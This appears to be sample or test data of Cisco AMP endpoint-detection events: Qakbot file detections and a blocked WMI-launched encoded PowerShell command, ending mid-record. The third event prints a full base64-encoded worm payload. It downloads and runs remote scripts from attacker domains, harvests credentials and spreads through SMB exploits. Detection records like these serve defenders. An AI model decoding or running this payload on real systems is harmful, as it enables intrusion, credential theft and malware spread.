-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E 